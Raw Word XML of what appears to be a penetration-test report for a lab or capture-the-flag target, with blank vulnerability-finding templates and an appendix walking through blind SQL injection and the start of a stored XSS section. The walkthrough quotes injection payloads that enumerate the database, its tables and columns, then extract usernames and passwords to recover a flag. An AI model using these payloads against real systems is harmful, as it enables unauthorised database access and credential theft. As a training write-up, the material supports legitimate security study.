            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="22"/>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325119"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="23"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FDA1016" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>How can we reproduce the exploit for this vulnerability?</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325120"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="24"/>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325121"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:bookmarkEnd w:id="25"/>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325122"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:bookmarkEnd w:id="26"/>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325123"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:bookmarkEnd w:id="27"/>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325124"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="28"/>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325125"/>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687EAB">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="30" w:name="_Toc71325126"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="30"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="73EBA2A5" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E" w:rsidP="00687EAB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Detailed description of the vulnerability, including a risk statement.</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687EAB">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="31" w:name="_Toc71325127"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="31"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="234A3A56" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E" w:rsidP="00687EAB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>How can we reproduce the exploit for this vulnerability?</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687EAB">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="32" w:name="_Toc71325128"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="32"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="41184AB1" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E" w:rsidP="00687EAB">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687EAB">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="33" w:name="_Toc71325129"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:bookmarkEnd w:id="33"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30B24CD0" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E" w:rsidP="00687EAB">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687EAB">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="34" w:name="_Toc71325130"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:bookmarkEnd w:id="34"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4A94690D" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E" w:rsidP="00687EAB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Informational / Low / Medium / High / Extreme</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A8EFE3A" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E" w:rsidP="00687EAB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>This is the reasoning behind my rating</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687EAB">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="35" w:name="_Toc71325131"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:bookmarkEnd w:id="35"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2EC165AE" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E" w:rsidP="00687EAB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>http://example.com</w:t>
            </w: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687EAB">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="36" w:name="_Toc71325132"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="36"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0890796A" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E" w:rsidP="00687EAB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The fix goes here</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E25E3D1" w14:textId="600CB81F" w:rsidR="002B68D3" w:rsidRDefault="002B68D3" w:rsidP="008C1E5E"/>
    <w:p w14:paraId="63006569" w14:textId="77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB07CC0" w14:textId="64054779" w:rsidR="002B68D3" w:rsidRDefault="002B68D3" w:rsidP="002B68D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc71325133"/>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trainings</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325134"/>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77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Detailed description of the vulnerability, including a risk statement.</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325135"/>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457A" w14:textId="77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
            </w: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325136"/>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77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
            <w:pPr>
              <w:widowControl w:val="0"/>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325137"/>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77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</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325138"/>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EFE8" w14:textId="77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Informational / Low / Medium / High / Extreme</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7D4F42" w14:textId="77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>This is the reasoning behind my rating</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325139"/>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77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>http://example.com</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325140"/>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DE55" w14:textId="77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The fix goes here</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="556EA481" w14:textId="77777777" w:rsidR="002B68D3" w:rsidRDefault="002B68D3" w:rsidP="002B68D3"/>
    <w:p w14:paraId="63DB9A41" w14:textId="77777777" w:rsidR="008C1E5E" w:rsidRDefault="008C1E5E"/>
    <w:p w14:paraId="3D3F9A72" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14DCE8" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Appendix_I_-"/>
      <w:bookmarkStart w:id="46" w:name="_Toc71325141"/>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325142"/>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325143"/>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2"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4204" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AB1ACE1" w14:textId="1F2D1B6D" w:rsidR="003649DF" w:rsidRDefault="009932A2" w:rsidP="00DB2582">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>rom the</w:t>
            </w:r>
            <w:r w:rsidR="005E23B4">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> responses of a) and b)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A42A09">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> and 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 substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4204" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594DE4EA" w14:textId="77777777" w:rsidR="00737772" w:rsidRDefault="00B31B96" w:rsidP="00DB2582">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>database(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)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6250A037" w14:textId="12D0F892" w:rsidR="00AA76CE"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p>
          <w:p w14:paraId="1D045A65" w14:textId="0BB36072" w:rsidR="00962814" w:rsidRDefault="00962814" w:rsidP="00DB2582">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>hen we have two options:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1F37E7" w14:textId="6D42F72C"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will</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> use common sense here to tell whether we have got all the characters of what we are looking for, or there is actually a next character but it is missing in the current candidate charset, which should be a very rare case but if it happens, we will need to expand our charset</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37820F45"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lastRenderedPageBreak/>
              <w:t>sqli.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00D81A9D">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> and find out </w:t>
            </w:r>
            <w:r w:rsidR="00666F53">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">the value of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00D81A9D">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>database(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D81A9D">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>),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(table_name,1,9)=BINARY 'Trainings'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(table_name,1,5)=BINARY 'Users'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&lt;&gt;'testing'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 xml:space="preserve">n a), we do the same thing as step 2 to get the first table name of “Secure” from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>information_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A937121" w14:textId="02680E13"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 which is not “testing”. This gives us the second table name “Trainings”.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC7D37F" w14:textId="2752C6C9" w:rsidR="00654AC7" w:rsidRDefault="00654AC7" w:rsidP="00DB2582">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Next in c), we can get the third table name “Users” by guessing table name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204D4E9F" w:rsidR="00654AC7" w:rsidRPr="00654AC7" w:rsidRDefault="00FE5F13" w:rsidP="00DB2582">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">It might be the case that we ran out the candidate characters as mentioned in step 2 and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000B3EA6"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00AA319D" w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>information_schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AA319D" w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AA319D" w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AA319D"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proofErr w:type="spellStart"/>
            <w:r w:rsidR="00907ED6"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(column_name,1,2)=BINARY 'id' and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&lt;&gt;'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B86EC7">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B86EC7">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>",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roles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"HR admin"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0684C3" w14:textId="77777777" w:rsidR="00023B7A" w:rsidRDefault="00023B7A" w:rsidP="00DB2582">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="025DF7A0" w14:textId="01AB23C6" w:rsidR="00023B7A" w:rsidRDefault="00023B7A" w:rsidP="00DB2582">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ext, we want to find out who are “HR admin”.</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NULL,roles</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> from Users having</w:t>
            </w:r>
            <w:r w:rsidR="00105647"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proofErr w:type="spellStart"/>
            <w:r w:rsidR="00105647"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NULL,username</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">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(password,1,32)=BINARY 'FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Wear_some_glasses_minions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">!}' and </w:t>
            </w:r>
            <w:r w:rsidRPr="00437C9E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>username=BINARY '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00112E4F">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>prodigysml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>” which turns out to be the flag</w:t>
            </w:r>
            <w:r w:rsidR="00313563">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>: “</w:t>
            </w:r>
            <w:r w:rsidR="00313563" w:rsidRPr="00313563">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00313563" w:rsidRPr="00313563">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Wear_some_glasses_minions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00313563" w:rsidRPr="00313563">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>!}</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CD9AFF"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and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> automated 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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00277A66" w:rsidRPr="00277A66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00277A66" w:rsidRPr="00277A66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">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ED7E7A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the file</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6A7AB3"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End w:id="50"/>
      <w:r w:rsidRPr="00ED14CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED14CE">
        <w:t>ection</w:t>
      </w:r>
      <w:r w:rsidR="00F13228">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED14CE">
        <w:t>2 – stored cross-site scripting exploitation walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048EC5A2" w14:textId="0D977B95" w:rsidR="00ED14CE" w:rsidRDefault="00D01380" w:rsidP="00D01380">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Exploitation_1"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exploitation 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A729812" w14:textId="67138D71"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passing the probation on behalf of the HR team member.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
